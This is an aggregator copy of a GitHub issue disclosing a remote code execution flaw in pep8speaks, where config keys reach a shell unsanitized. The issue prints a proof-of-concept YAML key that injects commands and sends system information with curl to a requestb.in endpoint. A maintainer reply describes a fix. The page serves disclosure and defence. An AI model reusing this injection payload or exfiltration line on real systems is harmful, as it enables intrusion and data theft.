Stuck on an issue?
Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.
And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.
Remote code execution
See original GitHub issueThere is a remote code execution vector, via the .pep8speaks.yaml file in the source repository. The keys in the pycodestyle dictionary are not sanitized before being passed to subprocess.Popen(shell=True).
pycodestyle:
max-line-length: 100 # Default is 79 in PEP8
";(id;pwd;ls;uname -a) | curl -X POST -d @- http://requestb.in/1ap8agd1;#": 5
This is demonstrated in pull #27 and https://requestb.in/1ap8agd1?inspect
While nothing terribly secret was posted above, the content of various bits of the environment are equally accessible.
Issue Analytics
- State:
- Created 7 years ago
- Comments:8 (3 by maintainers)
Top Results From Across the Web
What is Remote Code Execution (RCE)? - Check Point Software
Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can...
Read more >What is Remote Code Execution (RCE) Vulnerability - Wallarm
Remote Code Execution or execution, also known as Arbitrary Code Execution, is a concept that describes a form of cyberattack in which the...
Read more >Remote Code Execution (RCE) - Bugcrowd
Remote code execution is a cyber-attack whereby an attacker can remotely execute commands on someone else's computing device. Remote code executions (RCEs) ...
Read more >Remote Code Execution (RCE) - Kaspersky IT Encyclopedia
One of the most dangerous types of computer vulnerabilities. It allows an attacker to remotely run malicious code within the target system on...
Read more >Remote Code Execution - an overview | ScienceDirect Topics
Remote code execution allows an attacker or penetration tester to fully and completely control the remote computer as if he/she were physically sitting...
Read more >
Top Related Medium Post
No results found
Top Related StackOverflow Question
No results found
Troubleshoot Live Code
Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start Free
Top Related Reddit Thread
No results found
Top Related Hackernoon Post
No results found
Top Related Tweet
No results found
Top Related Dev.to Post
No results found
Top Related Hashnode Post
No results found
@OrkoHunter Please look into this.
I’ve added a check that the updated dictionary will only contain the keys defined (and expected).